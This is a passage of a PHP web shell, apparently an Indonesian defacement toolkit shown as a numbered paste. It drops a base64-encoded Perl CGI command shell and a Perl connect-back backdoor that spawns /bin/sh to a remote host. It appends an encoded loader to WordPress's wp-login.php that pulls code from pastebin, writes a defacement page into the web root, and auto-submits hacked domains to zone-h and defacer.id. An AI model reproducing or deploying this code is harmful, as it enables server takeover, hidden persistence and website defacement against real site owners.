HRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMKIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRXhlY3V0ZUNvbW1hbmQKewoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZAoJewoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUKCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4KCQkKCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOwoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOwoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7Cgl9CgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lgo8L2NvZGU+CkVORAoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7Cgl9CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJfQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCSZQcmludEZpbGVVcGxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJJlByaW50UGFnZUhlYWRlcigiYyIpOwoKCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsKCX0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50Cgl7CgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpCgkJewoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsKCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307CgkJCWNsb3NlKFVQTE9BREZJTEUpOwoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7CgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7CgkJfQoJfQoJcHJpbnQgIjwvY29kZT4iOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkmUHJpbnRQYWdlRm9vdGVyOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsKIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJlJlYWRQYXJzZTsKJkdldENvb2tpZXM7CgokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9OwokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307CiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307CiRSdW5Db21tYW5kID0gJGlueydjJ307CiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsKJE9wdGlvbnMgPSAkaW57J28nfTsKCiRBY3Rpb24gPSAkaW57J2EnfTsKJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAkaW57J2QnfTsKY2hvcCgkQ3VycmVudERpciA9IGAkQ21kUHdkYCkgaWYoJEN1cnJlbnREaXIgZXEgIiIpOwoKJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOwoKaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4KewoJJlBlcmZvcm1Mb2dpbjsKfQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQKewoJJkV4ZWN1dGVDb21tYW5kOwp9CmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlCnsKCSZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CgkmRG93bmxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0K';
543.  
544. $file = fopen("izo.cin" ,"w+");
545. $write = fwrite ($file ,base64_decode($cgishellizocin));
546. fclose($file);
547. chmod("izo.cin",0755);
548. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
549. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
550. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
551. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
552. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
553. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
554. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
555. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
556. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
557. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
558. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
559. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
560. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
561. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
562. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
563. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
564. YXRhY2hlZFxuXG4iOw==';
565.  
566. $file = fopen("dc.pl" ,"w+");
567. $write = fwrite ($file ,base64_decode($netcatshell));
568. fclose($file);
569. chmod("dc.pl",0755);
570. echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe>
571.  
572.  
573. </div>";
574.  
575.  
576. }
577.  
578. elseif($_GET['do'] == 'deleteme') {
579. unlink(__FILE__);
580. echo "<script>window.location='./';</script>";
581. }
582. elseif($_GET['do'] == 'mirror') {
583. if($_POST['arsip'] == '1') {
584. $domain = explode("\r\n", $_POST['url']);
585. $nick = $_POST['nick'];
586. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
587. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
588. function zoneh($url,$nick) {
589. $ch = curl_init("http://www.zone-h.com/notify/single");
590. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
591. curl_setopt($ch, CURLOPT_POST, true);
592. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
593. return curl_exec($ch);
594. curl_close($ch);
595. }
596. foreach($domain as $url) {
597. $zoneh = zoneh($url,$nick);
598. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
599. echo "$url -> <font color=lime>OK</font><br>";
600. } else {
601. echo "$url -> <font color=red>ERROR</font><br>";
602. }
603. }
604. } if($_POST['arsip'] == '2') {
605. $site = explode("\r\n", $_POST['sites']);
606. $hekel = $_POST['nick'];
607. $tim = $_POST['tim'];
608. foreach($site as $sites) {
609. $zh = $sites;
610. $form_url = "https://www.defacer.id/notify";
611. $data_to_post = array();
612. $data_to_post['attacker'] = "$hekel";
613. $data_to_post['team'] = "$tim";
614. $data_to_post['poc'] = 'SQL Injection';
615. $data_to_post['url'] = "$zh";
616. $curl = curl_init();
617. curl_setopt($curl,CURLOPT_URL, $form_url);
618. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
619. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
620. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
621. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
622. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
623. $result = curl_exec($curl);
624. echo $result;
625. curl_close($curl);
626. echo "<br>";
627. }
628.  
629. }
630. else {
631. echo "
632. <script type='text/javascript'>//<![CDATA[
633. window.onload=function(){
634. document.getElementById('arsip').addEventListener('change', function () {
635. var style = this.value == 2 ? 'block' : 'none';
636. document.getElementById('defacerid').style.display = style;
637. });
638. }//]]>
639.  
640. </script><center>
641. <form method='post'>
642. <select class='select' id='arsip' name='arsip' style='width: 450px;' height='10'>
643. <option value='1'>Zone-h</option>
644. <option value='2'>Defacer ID</option></select><br>
645. <u>Defacer</u>: <br>
646. <input type='text' name='nick' size='50' value='7atim'><br>
647. <div id='defacerid' style='display: none;'><br>
648. <u>Team</u>:<br>
649. <input type='text' name='tim' size='50' value='Indonesian Code Party'><br><br>
650. </div>
651. <u>Domains</u>: <br>
652. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
653. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
654. </form>";
655. }
656. echo "</center>";
657. }
658. elseif($_GET['do'] == 'ndelikne') {
659. if (file_exists($_SERVER['DOCUMENT_ROOT']."/wp-login.php")){
660. $myfile = fopen($_SERVER['DOCUMENT_ROOT']."/wp-login.php", "a");
661. fwrite($myfile, "\r\n".base64_decode("aWYgKGlzc2V0KCRfR0VUWyIweCJdKSl7QGZpbGVfcHV0X2NvbnRlbnRzKCIweC5waHAiLGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9OZXVoeVB4aiIpKTtlY2hvICI8YSBocmVmPScweC5waHAnPjxoMj4weDE5OTk8L2E+Ijt9"));
662. fclose($myfile);
663. echo "WORDPRESS OK";
664. }
665.  
666.  
667. }
668. elseif($_GET['do'] == 'hek') {
669. $url="http://" . $_SERVER['SERVER_NAME']."/JANCOK.htm";
670. $hh=$_SERVER['DOCUMENT_ROOT']."/JANCOK.htm";
671. @file_put_contents($hh ,file_get_contents("http://pastebin.com/raw/PDcuwBug"));
672. function zoneh($url,$nick) {
673. $ch = curl_init("http://www.zone-h.com/notify/single");
674. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
675. curl_setopt($ch, CURLOPT_POST, true);
676. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
677. return curl_exec($ch);
678. curl_close($ch);
679. }
680. $zoneh = zoneh($url,"7atim");
681. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
682. echo "$url -> <font color=lime>OK</font><br>";
683. } else {
684. echo "$url -> <font color=red>ERROR</font><br>";
685. }
686. }
687. elseif($_GET['do'] == 'auto_cu_wp') {
688. if($_POST['gass']) {
689. echo "<center><h1>WordPress Auto Change User 2</h1>
690. <form method='post'>
691. Link Config: <br>
692. <textarea name='link' style='width: 450px; height:250px;'>";
693. UrlLoop($_POST['linkconf'],'wordpress');
694. echo"</textarea><br>
695. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
696. </form></center>";
697. } else {
698. echo "<center><h1>WordPress Auto Change User 2</h1>
699. <form method='post'>
700. Link Config: <br>
701. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
702. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
703. </form></center>";
704. }
705. if($_POST['auto_cu_wp']) {
706.  
707. function anucurl($sites) {
708. $ch = curl_init($sites);
709. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
710. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
